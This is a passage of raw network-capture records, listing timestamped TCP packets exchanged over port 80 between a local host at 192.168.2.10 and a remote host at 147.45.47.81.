                                                                                                                                                                                                            Nov 14, 2024 12:19:57.497189045 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.497328997 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.497358084 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.497380972 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.497396946 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.497411013 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.497421026 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.497431040 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.497440100 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.497596979 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.497596979 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.499521017 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.499531031 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.499538898 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.499548912 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.499593019 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.499603033 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.499700069 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.499748945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.499764919 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.499773979 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.499782085 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.499849081 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500006914 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500029087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500037909 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500061989 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500085115 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500092983 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500102997 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500158072 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500170946 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500195026 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500211000 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500220060 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500255108 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500291109 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500432014 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500442028 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500452042 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500461102 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500493050 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500533104 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500647068 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500665903 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500713110 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500716925 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500725985 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500735998 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500770092 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500905037 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500947952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500957966 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.500996113 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.501029968 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.501100063 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.501110077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.501120090 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.501144886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.501152992 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.501154900 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.501200914 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.501357079 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.501367092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.501375914 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.501419067 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.522686005 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.522697926 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.522708893 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.522759914 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.524920940 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.524943113 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.524951935 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.524990082 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.525021076 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.530997992 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531008005 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531018972 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531056881 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531065941 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531078100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531088114 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531117916 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531148911 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531336069 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531352997 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531362057 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531403065 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531487942 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531497955 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531522036 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531532049 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531539917 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531588078 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531748056 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531764030 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531774998 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531784058 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531799078 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531843901 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531874895 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531913042 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531919003 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531925917 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531979084 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.531997919 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532010078 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532057047 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532236099 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532246113 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532255888 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532289982 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532371998 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532382011 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532392025 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532413960 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532422066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532424927 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532468081 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532728910 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532740116 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532748938 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532780886 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532782078 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532793999 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532803059 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532824993 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532835007 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532836914 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532845020 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532854080 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532876968 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.532901049 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.533356905 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.533366919 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.533373117 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.533420086 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.539380074 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.539403915 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.539413929 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.539464951 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.616245031 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.616256952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.616266966 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.616276026 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.616286039 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.616295099 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.616305113 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.616339922 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.616391897 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.616399050 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.616410017 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.616455078 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.618381977 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.618437052 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.619632959 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.619687080 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.619724035 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.619760036 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.619786978 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.619796038 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.619822979 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.619836092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.619891882 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.619926929 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.619955063 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.619976044 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.619988918 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620001078 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620003939 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620011091 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620023012 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620033026 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620043993 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620045900 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620059967 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620062113 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620071888 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620083094 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620093107 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620104074 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620105982 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620114088 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620130062 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620140076 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620143890 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620152950 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620143890 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620162964 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620173931 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620183945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620194912 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620197058 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620203972 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620218039 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620228052 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620237112 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620248079 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620249987 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620249987 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620249987 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620256901 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620268106 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620277882 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620295048 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620295048 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620310068 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620337963 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620359898 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620548964 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.620606899 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.646173954 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.646193981 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.646207094 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.646248102 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.649245977 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.649264097 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.649276018 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.649307966 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.649341106 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654618979 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654643059 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654655933 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654665947 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654678106 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654689074 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654699087 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654710054 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654721975 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654762030 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654769897 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654783964 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654805899 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654835939 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654879093 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654932976 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654944897 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654956102 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654967070 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654997110 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.654997110 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655009031 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655020952 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655059099 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655222893 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655244112 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655256033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655292034 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655345917 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655383110 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655394077 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655411005 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655431986 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655445099 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655618906 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655631065 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655642033 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655653000 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655666113 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655675888 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655683041 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655690908 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655700922 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655730009 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.655745983 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656230927 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656330109 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656339884 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656348944 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656361103 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656366110 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656377077 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656388044 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656392097 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656399012 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656410933 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656420946 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656431913 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656435013 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656445026 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656459093 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.656490088 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:57.658173084 CET8049958147.45.47.81192.168.2.10
